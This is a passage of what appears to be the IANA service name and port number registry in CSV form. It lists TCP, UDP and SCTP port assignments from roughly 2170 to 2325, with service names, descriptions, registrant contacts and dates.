Port,[Elgato_Systems],[Elgato_Systems],2004-11,,,,, eyetv,2170,udp,EyeTV Server Port,[Elgato_Systems],[Elgato_Systems],2004-11,,,,, msfw-storage,2171,tcp,MS Firewall Storage,,,,,,,, msfw-storage,2171,udp,MS Firewall Storage,,,,,,,, msfw-s-storage,2172,tcp,MS Firewall SecureStorage,,,,,,,, msfw-s-storage,2172,udp,MS Firewall SecureStorage,,,,,,,, msfw-replica,2173,tcp,MS Firewall Replication,,,,,,,, msfw-replica,2173,udp,MS Firewall Replication,,,,,,,, msfw-array,2174,tcp,MS Firewall Intra Array,[Itai_Greenberg],[Itai_Greenberg],2004-11,,,,, msfw-array,2174,udp,MS Firewall Intra Array,[Itai_Greenberg],[Itai_Greenberg],2004-11,,,,, airsync,2175,tcp,Microsoft Desktop AirSync Protocol,,,,,,,, airsync,2175,udp,Microsoft Desktop AirSync Protocol,,,,,,,, rapi,2176,tcp,Microsoft ActiveSync Remote API,[Jon_Xu],[Jon_Xu],2005-08,,,,, rapi,2176,udp,Microsoft ActiveSync Remote API,[Jon_Xu],[Jon_Xu],2005-08,,,,, qwave,2177,tcp,qWAVE Bandwidth Estimate,[Gabe_Frost],[Gabe_Frost],2005-08,,,,, qwave,2177,udp,qWAVE Bandwidth Estimate,[Gabe_Frost],[Gabe_Frost],2005-08,,,,, bitspeer,2178,tcp,Peer Services for BITS,[Jeff_Roberts],[Jeff_Roberts],2005-11,,,,, bitspeer,2178,udp,Peer Services for BITS,[Jeff_Roberts],[Jeff_Roberts],2005-11,,,,, vmrdp,2179,tcp,Microsoft RDP for virtual machines,[Brian_Henry],[Brian_Henry],2007-03,,,,, vmrdp,2179,udp,Microsoft RDP for virtual machines,[Brian_Henry],[Brian_Henry],2007-03,,,,, mc-gt-srv,2180,tcp,Millicent Vendor Gateway Server,[Steve_Glassman],[Steve_Glassman],,,,,, mc-gt-srv,2180,udp,Millicent Vendor Gateway Server,[Steve_Glassman],[Steve_Glassman],,,,,, eforward,2181,tcp,eforward,[Greg_Pringle],[Greg_Pringle],,,,,, eforward,2181,udp,eforward,[Greg_Pringle],[Greg_Pringle],,,,,, cgn-stat,2182,tcp,CGN status,,,,,,,, cgn-stat,2182,udp,CGN status,,,,,,,, cgn-config,2183,tcp,Code Green configuration,[Chris_Michaelson],[Chris_Michaelson],2005-08,,,,, cgn-config,2183,udp,Code Green configuration,[Chris_Michaelson],[Chris_Michaelson],2005-08,,,,, nvd,2184,tcp,NVD User,[Yves_Gattegno],[Yves_Gattegno],2004-12,,,,, nvd,2184,udp,NVD User,[Yves_Gattegno],[Yves_Gattegno],2004-12,,,,, onbase-dds,2185,tcp,OnBase Distributed Disk Services,[Paul_Tam],[Paul_Tam],2004-12,,,,, onbase-dds,2185,udp,OnBase Distributed Disk Services,[Paul_Tam],[Paul_Tam],2004-12,,,,, gtaua,2186,tcp,Guy-Tek Automated Update Applications,[Daniel_Story],[Daniel_Story],2008-01-25,,,,, gtaua,2186,udp,Guy-Tek Automated Update Applications,[Daniel_Story],[Daniel_Story],2008-01-25,,,,, ssmc,2187,tcp,Sepehr System Management Control,,,,,,,, ssmd,2187,udp,Sepehr System Management Data,[Shahriar_Pourazin],[Shahriar_Pourazin],2008-12-02,,,,, radware-rpm,2188,tcp,Radware Resource Pool Manager,[Radware_LTD],[Samuel_Bercovici],2011-08-05,,,,, ,2188,udp,Reserved,,,,,,,, radware-rpm-s,2189,tcp,Secure Radware Resource Pool Manager,[Radware_LTD],[Samuel_Bercovici],2011-08-05,,,,, ,2189,udp,Reserved,,,,,,,, tivoconnect,2190,tcp,TiVoConnect Beacon,[Jeffrey_J_Peters],[Jeffrey_J_Peters],2002-08,,,,, tivoconnect,2190,udp,TiVoConnect Beacon,[Jeffrey_J_Peters],[Jeffrey_J_Peters],2002-08,,,,, tvbus,2191,tcp,TvBus Messaging,[Brian_W_Beach],[Brian_W_Beach],2003-01,,,,, tvbus,2191,udp,TvBus Messaging,[Brian_W_Beach],[Brian_W_Beach],2003-01,,,,, asdis,2192,tcp,ASDIS software management,[ASDIS_Support],[ASDIS_Support],2005-08,,,,, asdis,2192,udp,ASDIS software management,[ASDIS_Support],[ASDIS_Support],2005-08,,,,, drwcs,2193,tcp,Dr.Web Enterprise Management Service,[Eugeny_Gladkih],[Eugeny_Gladkih],2008-01-31,,,,, drwcs,2193,udp,Dr.Web Enterprise Management Service,[Eugeny_Gladkih],[Eugeny_Gladkih],2008-01-31,,,,, ,2194-2196,,Unassigned,,,,,,,Unauthorized Use Known on ports 2194-2196, mnp-exchange,2197,tcp,MNP data exchange,[Peter_Pramberger],[Peter_Pramberger],2004-11,,,,, mnp-exchange,2197,udp,MNP data exchange,[Peter_Pramberger],[Peter_Pramberger],2004-11,,,,, onehome-remote,2198,tcp,OneHome Remote Access,,,,,,,, onehome-remote,2198,udp,OneHome Remote Access,,,,,,,, onehome-help,2199,tcp,OneHome Service Port,[Jim_Herman],[Jim_Herman],2005-08,,,,, onehome-help,2199,udp,OneHome Service Port,[Jim_Herman],[Jim_Herman],2005-08,,,,, ici,2200,tcp,ICI,[Brent_Hines],[Brent_Hines],,,,,, ici,2200,udp,ICI,[Brent_Hines],[Brent_Hines],,,,,, ats,2201,tcp,Advanced Training System Program,,,,,,,, ats,2201,udp,Advanced Training System Program,,,,,,,, imtc-map,2202,tcp,Int. Multimedia Teleconferencing Cosortium,[Pat_Galvin],[Pat_Galvin],,,,,, imtc-map,2202,udp,Int. Multimedia Teleconferencing Cosortium,[Pat_Galvin],[Pat_Galvin],,,,,, b2-runtime,2203,tcp,b2 Runtime Protocol,,,,,,,, b2-runtime,2203,udp,b2 Runtime Protocol,,,,,,,, b2-license,2204,tcp,b2 License Server,[Helge_Frank_Zimpel],[Helge_Frank_Zimpel],2006-01,,,,, b2-license,2204,udp,b2 License Server,[Helge_Frank_Zimpel],[Helge_Frank_Zimpel],2006-01,,,,, jps,2205,tcp,Java Presentation Server,[Leif_Jakob],[Leif_Jakob],2006-01,,,,, jps,2205,udp,Java Presentation Server,[Leif_Jakob],[Leif_Jakob],2006-01,,,,, hpocbus,2206,tcp,HP OpenCall bus,[Jerome_Forissier],[Jerome_Forissier],2005-12,,,,, hpocbus,2206,udp,HP OpenCall bus,[Jerome_Forissier],[Jerome_Forissier],2005-12,,,,, hpssd,2207,tcp,HP Status and Services,[Donald_Welch],[Donald_Welch],2006-05,,,,, hpssd,2207,udp,HP Status and Services,[Donald_Welch],[Donald_Welch],2006-05,,,,, hpiod,2208,tcp,HP I/O Backend,[David_Suffield],[David_Suffield],2006-05,,,,, hpiod,2208,udp,HP I/O Backend,[David_Suffield],[David_Suffield],2006-05,,,,, rimf-ps,2209,tcp,HP RIM for Files Portal Service,[Patty_Ho],[Patty_Ho],2007-05,,,,, rimf-ps,2209,udp,HP RIM for Files Portal Service,[Patty_Ho],[Patty_Ho],2007-05,,,,, noaaport,2210,tcp,NOAAPORT Broadcast Network,,,,,,,, noaaport,2210,udp,NOAAPORT Broadcast Network,,,,,,,, emwin,2211,tcp,EMWIN,[Antonio_Querubin],[Antonio_Querubin],2008-03-10,,,,, emwin,2211,udp,EMWIN,[Antonio_Querubin],[Antonio_Querubin],2008-03-10,,,,, leecoposserver,2212,tcp,LeeCO POS Server Service,[Patrick_Lee],[Patrick_Lee],2008-03-10,,,,, leecoposserver,2212,udp,LeeCO POS Server Service,[Patrick_Lee],[Patrick_Lee],2008-03-10,,,,, kali,2213,tcp,Kali,[Jay_Cotton],[Jay_Cotton],,,,,, kali,2213,udp,Kali,[Jay_Cotton],[Jay_Cotton],,,,,, rpi,2214,tcp,RDQ Protocol Interface,[Les_Mather],[Les_Mather],2005-12,,,,, rpi,2214,udp,RDQ Protocol Interface,[Les_Mather],[Les_Mather],2005-12,,,,, ipcore,2215,tcp,IPCore.co.za GPRS,[Administrator],[Administrator],2005-12,,,,, ipcore,2215,udp,IPCore.co.za GPRS,[Administrator],[Administrator],2005-12,,,,, vtu-comms,2216,tcp,VTU data service,[David_Barrass],[David_Barrass],2006-01,,,,, vtu-comms,2216,udp,VTU data service,[David_Barrass],[David_Barrass],2006-01,,,,, gotodevice,2217,tcp,GoToDevice Device Management,[John_Lisek],[John_Lisek],2006-01,,,,, gotodevice,2217,udp,GoToDevice Device Management,[John_Lisek],[John_Lisek],2006-01,,,,, bounzza,2218,tcp,Bounzza IRC Proxy,[Danko_Alexeyev],[Danko_Alexeyev],2006-02,,,,, bounzza,2218,udp,Bounzza IRC Proxy,[Danko_Alexeyev],[Danko_Alexeyev],2006-02,,,,, netiq-ncap,2219,tcp,NetIQ NCAP Protocol,[Roger_Huebner],[Roger_Huebner],2010-08-25,,,,, netiq-ncap,2219,udp,NetIQ NCAP Protocol,[Roger_Huebner],[Roger_Huebner],2010-08-25,,,,, netiq,2220,tcp,NetIQ End2End,[Michael_Sharpe],[Michael_Sharpe],2010-09-14,,,,, netiq,2220,udp,NetIQ End2End,[Michael_Sharpe],[Michael_Sharpe],2010-09-14,,,,, rockwell-csp1,2221,tcp,Rockwell CSP1,[Brian_Batke],[Brian_Batke],,,,,, rockwell-csp1,2221,udp,Rockwell CSP1,[Brian_Batke],[Brian_Batke],,,,,, EtherNet-IP-1,2222,tcp,"EtherNet/IP I/O IANA assigned this well-formed service name as a replacement for ""EtherNet/IP-1"".",[Brian_Batke_2],[Brian_Batke_2],,,,,,New contact added for port 2222 on 2008-02-01 EtherNet/IP-1,2222,tcp,EtherNet/IP I/O,[Brian_Batke_2],[Brian_Batke_2],,,,,,"New contact added for port 2222 on 2008-02-01 This entry is an alias to ""EtherNet-IP-1"". This entry is now historic, not usable for use with many common service discovery mechanisms." EtherNet-IP-1,2222,udp,"EtherNet/IP I/O IANA assigned this well-formed service name as a replacement for ""EtherNet/IP-1"".",[Brian_Batke_2],[Brian_Batke_2],,,,,,New contact added for port 2222 on 2008-02-01 EtherNet/IP-1,2222,udp,EtherNet/IP I/O,[Brian_Batke_2],[Brian_Batke_2],,,,,,"New contact added for port 2222 on 2008-02-01 This entry is an alias to ""EtherNet-IP-1"". This entry is now historic, not usable for use with many common service discovery mechanisms." rockwell-csp2,2223,tcp,Rockwell CSP2,[Brian_Batke],[Brian_Batke],,,,,, rockwell-csp2,2223,udp,Rockwell CSP2,[Brian_Batke],[Brian_Batke],,,,,, efi-mg,2224,tcp,Easy Flexible Internet/Multiplayer Games,[Thomas_Efer],[Thomas_Efer],2006-03,,,,, efi-mg,2224,udp,Easy Flexible Internet/Multiplayer Games,[Thomas_Efer],[Thomas_Efer],2006-03,,,,, rcip-itu,2225,tcp,Resource Connection Initiation Protocol,[ITU_TSB],[ITU_TSB],,,,,, ,2225,udp,Reserved,,,,,,,, rcip-itu,2225,sctp,Resource Connection Initiation Protocol,[ITU_TSB],[ITU_TSB],,,,,, di-drm,2226,tcp,Digital Instinct DRM,,,,,,,, di-drm,2226,udp,Digital Instinct DRM,,,,,,,, di-msg,2227,tcp,DI Messaging Service,[Sean_Ni],[Sean_Ni],2006-02,,,,, di-msg,2227,udp,DI Messaging Service,[Sean_Ni],[Sean_Ni],2006-02,,,,, ehome-ms,2228,tcp,eHome Message Server,[Peter_Gabriel],[Peter_Gabriel],2006-01,,,,, ehome-ms,2228,udp,eHome Message Server,[Peter_Gabriel],[Peter_Gabriel],2006-01,,,,, datalens,2229,tcp,DataLens Service,[Christopher_Bidwell],[Christopher_Bidwell],2006-02,,,,, datalens,2229,udp,DataLens Service,[Christopher_Bidwell],[Christopher_Bidwell],2006-02,,,,, queueadm,2230,tcp,MetaSoft Job Queue Administration Service,[Ilya_Melamed],[Ilya_Melamed],2006-06,,,,, queueadm,2230,udp,MetaSoft Job Queue Administration Service,[Ilya_Melamed],[Ilya_Melamed],2006-06,,,,, wimaxasncp,2231,tcp,WiMAX ASN Control Plane Protocol,[Prakash_Iyer],[Prakash_Iyer],2006-06,,,,, wimaxasncp,2231,udp,WiMAX ASN Control Plane Protocol,[Prakash_Iyer],[Prakash_Iyer],2006-06,,,,, ivs-video,2232,tcp,IVS Video default,[Thierry_Turletti],[Thierry_Turletti],,,,,, ivs-video,2232,udp,IVS Video default,[Thierry_Turletti],[Thierry_Turletti],,,,,, infocrypt,2233,tcp,INFOCRYPT,[Erica_Liu],[Erica_Liu],,,,,, infocrypt,2233,udp,INFOCRYPT,[Erica_Liu],[Erica_Liu],,,,,, directplay,2234,tcp,DirectPlay,[Ajay_Jindal],[Ajay_Jindal],,,,,, directplay,2234,udp,DirectPlay,[Ajay_Jindal],[Ajay_Jindal],,,,,, sercomm-wlink,2235,tcp,Sercomm-WLink,[Melinda_Tsao],[Melinda_Tsao],,,,,, sercomm-wlink,2235,udp,Sercomm-WLink,[Melinda_Tsao],[Melinda_Tsao],,,,,, nani,2236,tcp,Nani,[Steve_Benoit],[Steve_Benoit],,,,,, nani,2236,udp,Nani,[Steve_Benoit],[Steve_Benoit],,,,,, optech-port1-lm,2237,tcp,Optech Port1 License Manager,[Gerard_Cannie],[Gerard_Cannie],,,,,, optech-port1-lm,2237,udp,Optech Port1 License Manager,[Gerard_Cannie],[Gerard_Cannie],,,,,, aviva-sna,2238,tcp,AVIVA SNA SERVER,[Vick_Keshishian],[Vick_Keshishian],,,,,, aviva-sna,2238,udp,AVIVA SNA SERVER,[Vick_Keshishian],[Vick_Keshishian],,,,,, imagequery,2239,tcp,Image Query,[Charles_Jacobs],[Charles_Jacobs],,,,,, imagequery,2239,udp,Image Query,[Charles_Jacobs],[Charles_Jacobs],,,,,, recipe,2240,tcp,RECIPe,[Charlie_Limoges],[Charlie_Limoges],1997-12-16,,,,, recipe,2240,udp,RECIPe,[Charlie_Limoges],[Charlie_Limoges],1997-12-16,,,,, ivsd,2241,tcp,IVS Daemon,[Thierry_Turletti],[Thierry_Turletti],,,,,, ivsd,2241,udp,IVS Daemon,[Thierry_Turletti],[Thierry_Turletti],,,,,, foliocorp,2242,tcp,Folio Remote Server,[Pat_Mcgowan],[Pat_Mcgowan],,,,,, foliocorp,2242,udp,Folio Remote Server,[Pat_Mcgowan],[Pat_Mcgowan],,,,,, magicom,2243,tcp,Magicom Protocol,[Yossi_Appleboum],[Yossi_Appleboum],,,,,, magicom,2243,udp,Magicom Protocol,[Yossi_Appleboum],[Yossi_Appleboum],,,,,, nmsserver,2244,tcp,NMS Server,[Dmitry_Krasnonosenki],[Dmitry_Krasnonosenki],,,,,, nmsserver,2244,udp,NMS Server,[Dmitry_Krasnonosenki],[Dmitry_Krasnonosenki],,,,,, hao,2245,tcp,HaO,[Panic_Ride],[Panic_Ride],,,,,, hao,2245,udp,HaO,[Panic_Ride],[Panic_Ride],,,,,, pc-mta-addrmap,2246,tcp,PacketCable MTA Addr Map,[Dave_Maxwell],[Dave_Maxwell],,,,,, pc-mta-addrmap,2246,udp,PacketCable MTA Addr Map,[Dave_Maxwell],[Dave_Maxwell],,,,,, antidotemgrsvr,2247,tcp,Antidote Deployment Manager Service,[Rod_Waltermann],[Rod_Waltermann],2006-02,,,,, antidotemgrsvr,2247,udp,Antidote Deployment Manager Service,[Rod_Waltermann],[Rod_Waltermann],2006-02,,,,, ums,2248,tcp,User Management Service,[Andrew_Crockford],[Andrew_Crockford],,,,,, ums,2248,udp,User Management Service,[Andrew_Crockford],[Andrew_Crockford],,,,,, rfmp,2249,tcp,RISO File Manager Protocol,[Shinji_Yamanaka],[Shinji_Yamanaka],,,,,, rfmp,2249,udp,RISO File Manager Protocol,[Shinji_Yamanaka],[Shinji_Yamanaka],,,,,, remote-collab,2250,tcp,remote-collab,[Richard_Walters],[Richard_Walters],,,,,, remote-collab,2250,udp,remote-collab,[Richard_Walters],[Richard_Walters],,,,,, dif-port,2251,tcp,Distributed Framework Port,[Sebastien_Lambla],[Sebastien_Lambla],,,,,, dif-port,2251,udp,Distributed Framework Port,[Sebastien_Lambla],[Sebastien_Lambla],,,,,, njenet-ssl,2252,tcp,NJENET using SSL,[Hans_U_Schmidt],[Hans_U_Schmidt],,,,,, njenet-ssl,2252,udp,NJENET using SSL,[Hans_U_Schmidt],[Hans_U_Schmidt],,,,,, dtv-chan-req,2253,tcp,DTV Channel Request,[Richard_Hodges],[Richard_Hodges],,,,,, dtv-chan-req,2253,udp,DTV Channel Request,[Richard_Hodges],[Richard_Hodges],,,,,, seispoc,2254,tcp,Seismic P.O.C. Port,[Robert_Reimiller],[Robert_Reimiller],,,,,, seispoc,2254,udp,Seismic P.O.C. Port,[Robert_Reimiller],[Robert_Reimiller],,,,,, vrtp,2255,tcp,VRTP - ViRtue Transfer Protocol,[Max_Fudim],[Max_Fudim],,,,,, vrtp,2255,udp,VRTP - ViRtue Transfer Protocol,[Max_Fudim],[Max_Fudim],,,,,, pcc-mfp,2256,tcp,PCC MFP,[Kunihiko_Morota],[Kunihiko_Morota],2005-08,,,,, pcc-mfp,2256,udp,PCC MFP,[Kunihiko_Morota],[Kunihiko_Morota],2005-08,,,,, simple-tx-rx,2257,tcp,simple text/file transfer,[Daniel_Kilsdonk],[Daniel_Kilsdonk],2006-08,,,,, simple-tx-rx,2257,udp,simple text/file transfer,[Daniel_Kilsdonk],[Daniel_Kilsdonk],2006-08,,,,, rcts,2258,tcp,Rotorcraft Communications Test System,[Terry_Eldridge],[Terry_Eldridge],2006-08,,,,, rcts,2258,udp,Rotorcraft Communications Test System,[Terry_Eldridge],[Terry_Eldridge],2006-08,,,,, ,2259,,Unassigned,,,,2011-06-28,,,, apc-2260,2260,tcp,APC 2260,[American_Power_Conve],[American_Power_Conve],2002-02,,,,, apc-2260,2260,udp,APC 2260,[American_Power_Conve],[American_Power_Conve],2002-02,,,,, comotionmaster,2261,tcp,CoMotion Master Server,,,,,,,, comotionmaster,2261,udp,CoMotion Master Server,,,,,,,, comotionback,2262,tcp,CoMotion Backup Server,[Friedman_Wagner_Dobl],[Friedman_Wagner_Dobl],2005-09,,,,, comotionback,2262,udp,CoMotion Backup Server,[Friedman_Wagner_Dobl],[Friedman_Wagner_Dobl],2005-09,,,,, ecwcfg,2263,tcp,ECweb Configuration Service,[Anders_Hjelm],[Anders_Hjelm],2006-03,,,,, ecwcfg,2263,udp,ECweb Configuration Service,[Anders_Hjelm],[Anders_Hjelm],2006-03,,,,, apx500api-1,2264,tcp,Audio Precision Apx500 API Port 1,,,,,,,, apx500api-1,2264,udp,Audio Precision Apx500 API Port 1,,,,,,,, apx500api-2,2265,tcp,Audio Precision Apx500 API Port 2,[Robert_Wright],[Robert_Wright],,,,,, apx500api-2,2265,udp,Audio Precision Apx500 API Port 2,[Robert_Wright],[Robert_Wright],,,,,, mfserver,2266,tcp,M-Files Server,[Samppa_Lahtinen],[Samppa_Lahtinen],2004-06,,,,, mfserver,2266,udp,M-files Server,[Samppa_Lahtinen],[Samppa_Lahtinen],2004-06,,,,, ontobroker,2267,tcp,OntoBroker,[Dr_Michael_Erdmann],[Dr_Michael_Erdmann],2004-12,,,,, ontobroker,2267,udp,OntoBroker,[Dr_Michael_Erdmann],[Dr_Michael_Erdmann],2004-12,,,,, amt,2268,tcp,AMT,[Tom_Pusateri],[Tom_Pusateri],2004-12,,,,, amt,2268,udp,AMT,[Tom_Pusateri],[Tom_Pusateri],2004-12,,,,, mikey,2269,tcp,MIKEY,[Karl_Norrman],[Karl_Norrman],2004-12,,,,, mikey,2269,udp,MIKEY,[Karl_Norrman],[Karl_Norrman],2004-12,,,,, starschool,2270,tcp,starSchool,[Adam_Ernst],[Adam_Ernst],2004-12,,,,, starschool,2270,udp,starSchool,[Adam_Ernst],[Adam_Ernst],2004-12,,,,, mmcals,2271,tcp,Secure Meeting Maker Scheduling,,,,,,,, mmcals,2271,udp,Secure Meeting Maker Scheduling,,,,,,,, mmcal,2272,tcp,Meeting Maker Scheduling,[Andrew_H_Derbyshire],[Andrew_H_Derbyshire],2004-12,,,,, mmcal,2272,udp,Meeting Maker Scheduling,[Andrew_H_Derbyshire],[Andrew_H_Derbyshire],2004-12,,,,, mysql-im,2273,tcp,MySQL Instance Manager,[Petr_Chardin],[Petr_Chardin],2004-12,,,,, mysql-im,2273,udp,MySQL Instance Manager,[Petr_Chardin],[Petr_Chardin],2004-12,,,,, pcttunnell,2274,tcp,PCTTunneller,[ProControl_Technolog],[ProControl_Technolog],2004-12,,,,, pcttunnell,2274,udp,PCTTunneller,[ProControl_Technolog],[ProControl_Technolog],2004-12,,,,, ibridge-data,2275,tcp,iBridge Conferencing,,,,,,,, ibridge-data,2275,udp,iBridge Conferencing,,,,,,,, ibridge-mgmt,2276,tcp,iBridge Management,[Patrick_Fisher],[Patrick_Fisher],2004-12,,,,, ibridge-mgmt,2276,udp,iBridge Management,[Patrick_Fisher],[Patrick_Fisher],2004-12,,,,, bluectrlproxy,2277,tcp,Bt device control proxy,[Mark_de_Rooi],[Mark_de_Rooi],2004-12,,,,, bluectrlproxy,2277,udp,Bt device control proxy,[Mark_de_Rooi],[Mark_de_Rooi],2004-12,,,,, s3db,2278,tcp,Simple Stacked Sequences Database,[David_Brandon],[David_Brandon],2006-08,,,,, s3db,2278,udp,Simple Stacked Sequences Database,[David_Brandon],[David_Brandon],2006-08,,,,, xmquery,2279,tcp,xmquery,[Niels_Christiansen],[Niels_Christiansen],,,,,, xmquery,2279,udp,xmquery,[Niels_Christiansen],[Niels_Christiansen],,,,,, lnvpoller,2280,tcp,LNVPOLLER,,,,,,,, lnvpoller,2280,udp,LNVPOLLER,,,,,,,, lnvconsole,2281,tcp,LNVCONSOLE,,,,,,,, lnvconsole,2281,udp,LNVCONSOLE,,,,,,,, lnvalarm,2282,tcp,LNVALARM,,,,,,,, lnvalarm,2282,udp,LNVALARM,,,,,,,, lnvstatus,2283,tcp,LNVSTATUS,,,,,,,, lnvstatus,2283,udp,LNVSTATUS,,,,,,,, lnvmaps,2284,tcp,LNVMAPS,,,,,,,, lnvmaps,2284,udp,LNVMAPS,,,,,,,, lnvmailmon,2285,tcp,LNVMAILMON,[John_Payne],[John_Payne],,,,,, lnvmailmon,2285,udp,LNVMAILMON,[John_Payne],[John_Payne],,,,,, nas-metering,2286,tcp,NAS-Metering,[Steven_Sawkins],[Steven_Sawkins],,,,,, nas-metering,2286,udp,NAS-Metering,[Steven_Sawkins],[Steven_Sawkins],,,,,, dna,2287,tcp,DNA,[Tung_Nguyen],[Tung_Nguyen],,,,,, dna,2287,udp,DNA,[Tung_Nguyen],[Tung_Nguyen],,,,,, netml,2288,tcp,NETML,[Jochen_Hansmeyer],[Jochen_Hansmeyer],,,,,, netml,2288,udp,NETML,[Jochen_Hansmeyer],[Jochen_Hansmeyer],,,,,, dict-lookup,2289,tcp,Lookup dict server,[William_Fernando_Mat],[William_Fernando_Mat],2005-01,,,,, dict-lookup,2289,udp,Lookup dict server,[William_Fernando_Mat],[William_Fernando_Mat],2005-01,,,,, sonus-logging,2290,tcp,Sonus Logging Services,[Adwait_Sathe],[Adwait_Sathe],2005-08,,,,, sonus-logging,2290,udp,Sonus Logging Services,[Adwait_Sathe],[Adwait_Sathe],2005-08,,,,, eapsp,2291,tcp,EPSON Advanced Printer Share Protocol,[SEIKO_EPSON],[SEIKO_EPSON],2006-06,,,,, eapsp,2291,udp,EPSON Advanced Printer Share Protocol,[SEIKO_EPSON],[SEIKO_EPSON],2006-06,,,,, mib-streaming,2292,tcp,Sonus Element Management Services,[Linda_Lin],[Linda_Lin],2006-08,,,,, mib-streaming,2292,udp,Sonus Element Management Services,[Linda_Lin],[Linda_Lin],2006-08,,,,, npdbgmngr,2293,tcp,Network Platform Debug Manager,[Robert_Byrne],[Robert_Byrne],2006-09,,,,, npdbgmngr,2293,udp,Network Platform Debug Manager,[Robert_Byrne],[Robert_Byrne],2006-09,,,,, konshus-lm,2294,tcp,Konshus License Manager (FLEX),[Francois_Painchaud],[Francois_Painchaud],,,,,, konshus-lm,2294,udp,Konshus License Manager (FLEX),[Francois_Painchaud],[Francois_Painchaud],,,,,, advant-lm,2295,tcp,Advant License Manager,[Lars_Goran_Magnusson],[Lars_Goran_Magnusson],,,,,, advant-lm,2295,udp,Advant License Manager,[Lars_Goran_Magnusson],[Lars_Goran_Magnusson],,,,,, theta-lm,2296,tcp,Theta License Manager (Rainbow),[David_Thompson],[David_Thompson],,,,,, theta-lm,2296,udp,Theta License Manager (Rainbow),[David_Thompson],[David_Thompson],,,,,, d2k-datamover1,2297,tcp,D2K DataMover 1,,,,,,,, d2k-datamover1,2297,udp,D2K DataMover 1,,,,,,,, d2k-datamover2,2298,tcp,D2K DataMover 2,[Eric_Lan],[Eric_Lan],,,,,, d2k-datamover2,2298,udp,D2K DataMover 2,[Eric_Lan],[Eric_Lan],,,,,, pc-telecommute,2299,tcp,PC Telecommute,[John_Daniel_Bonamico],[John_Daniel_Bonamico],,,,,, pc-telecommute,2299,udp,PC Telecommute,[John_Daniel_Bonamico],[John_Daniel_Bonamico],,,,,, cvmmon,2300,tcp,CVMMON,[Roger_Kumpf],[Roger_Kumpf],,,,,, cvmmon,2300,udp,CVMMON,[Roger_Kumpf],[Roger_Kumpf],,,,,, cpq-wbem,2301,tcp,Compaq HTTP,[Scott_Shaffer],[Scott_Shaffer],,,,,, cpq-wbem,2301,udp,Compaq HTTP,[Scott_Shaffer],[Scott_Shaffer],,,,,, binderysupport,2302,tcp,Bindery Support,[Narasimha_Rao_N],[Narasimha_Rao_N],,,,,, binderysupport,2302,udp,Bindery Support,[Narasimha_Rao_N],[Narasimha_Rao_N],,,,,, proxy-gateway,2303,tcp,Proxy Gateway,[Paul_Funk],[Paul_Funk],,,,,, proxy-gateway,2303,udp,Proxy Gateway,[Paul_Funk],[Paul_Funk],,,,,, attachmate-uts,2304,tcp,Attachmate UTS,[George_Gianelos],[George_Gianelos],,,,,, attachmate-uts,2304,udp,Attachmate UTS,[George_Gianelos],[George_Gianelos],,,,,, mt-scaleserver,2305,tcp,MT ScaleServer,[Paul_Glaubitz],[Paul_Glaubitz],,,,,, mt-scaleserver,2305,udp,MT ScaleServer,[Paul_Glaubitz],[Paul_Glaubitz],,,,,, tappi-boxnet,2306,tcp,TAPPI BoxNet,[Richard_Spartz],[Richard_Spartz],,,,,, tappi-boxnet,2306,udp,TAPPI BoxNet,[Richard_Spartz],[Richard_Spartz],,,,,, pehelp,2307,tcp,pehelp,[Jens_Kilian],[Jens_Kilian],,,,,, pehelp,2307,udp,pehelp,[Jens_Kilian],[Jens_Kilian],,,,,, sdhelp,2308,tcp,sdhelp,[Annette_Klecha],[Annette_Klecha],,,,,, sdhelp,2308,udp,sdhelp,[Annette_Klecha],[Annette_Klecha],,,,,, sdserver,2309,tcp,SD Server,,,,,,,, sdserver,2309,udp,SD Server,,,,,,,, sdclient,2310,tcp,SD Client,[Jeurgen_Broesamle],[Jeurgen_Broesamle],,,,,, sdclient,2310,udp,SD Client,[Jeurgen_Broesamle],[Jeurgen_Broesamle],,,,,, messageservice,2311,tcp,Message Service,,,,,,,, messageservice,2311,udp,Message Service,,,,,,,, wanscaler,2312,tcp,WANScaler Communication Service,[Allen_Samuels],[Allen_Samuels],2006-11,,,,, wanscaler,2312,udp,WANScaler Communication Service,[Allen_Samuels],[Allen_Samuels],2006-11,,,,, iapp,2313,tcp,IAPP (Inter Access Point Protocol),[Henri_Moelard],[Henri_Moelard],,,,,, iapp,2313,udp,IAPP (Inter Access Point Protocol),[Henri_Moelard],[Henri_Moelard],,,,,, cr-websystems,2314,tcp,CR WebSystems,[Robin_Giese],[Robin_Giese],,,,,, cr-websystems,2314,udp,CR WebSystems,[Robin_Giese],[Robin_Giese],,,,,, precise-sft,2315,tcp,Precise Sft.,[Michael_Landwehr],[Michael_Landwehr],,,,,, precise-sft,2315,udp,Precise Sft.,[Michael_Landwehr],[Michael_Landwehr],,,,,, sent-lm,2316,tcp,SENT License Manager,[Pisharath_Krishnan],[Pisharath_Krishnan],,,,,, sent-lm,2316,udp,SENT License Manager,[Pisharath_Krishnan],[Pisharath_Krishnan],,,,,, attachmate-g32,2317,tcp,Attachmate G32,[Bryce_Bhatnagar],[Bryce_Bhatnagar],,,,,, attachmate-g32,2317,udp,Attachmate G32,[Bryce_Bhatnagar],[Bryce_Bhatnagar],,,,,, cadencecontrol,2318,tcp,Cadence Control,[Buck_Caldwell],[Buck_Caldwell],,,,,, cadencecontrol,2318,udp,Cadence Control,[Buck_Caldwell],[Buck_Caldwell],,,,,, infolibria,2319,tcp,InfoLibria,[Chris_Chiotasso],[Chris_Chiotasso],,,,,, infolibria,2319,udp,InfoLibria,[Chris_Chiotasso],[Chris_Chiotasso],,,,,, siebel-ns,2320,tcp,Siebel NS,[Gilberto_Arnaiz],[Gilberto_Arnaiz],,,,,, siebel-ns,2320,udp,Siebel NS,[Gilberto_Arnaiz],[Gilberto_Arnaiz],,,,,, rdlap,2321,tcp,RDLAP,[Robert_Wiebe],[Robert_Wiebe],,,,,, rdlap,2321,udp,RDLAP,[Robert_Wiebe],[Robert_Wiebe],,,,,, ofsd,2322,tcp,ofsd,,,,,,,, ofsd,2322,udp,ofsd,,,,,,,, 3d-nfsd,2323,tcp,3d-nfsd,[Mike_Sherrill],[Mike_Sherrill],,,,,, 3d-nfsd,2323,udp,3d-nfsd,[Mike_Sherrill],[Mike_Sherrill],,,,,, cosmocall,2324,tcp,Cosmocall,[Steve_Dellutri],[Steve_Dellutri],,,,,, cosmocall,2324,udp,Cosmocall,[Steve_Dellutri],[Steve_Dellutri],,,,,, ansysli,2325,tcp,ANSYS Licensing Interconnect,[Suzanne_Lorrin],[Suzanne_Lorrin],,,,,,Modified: 27 October 2008 ansysli,2325,udp,ANSYS Licensing Interconnect,[Suzanne_Lorrin],[Suzanne_Lorrin],,,,,,Modified: 27 October 2008 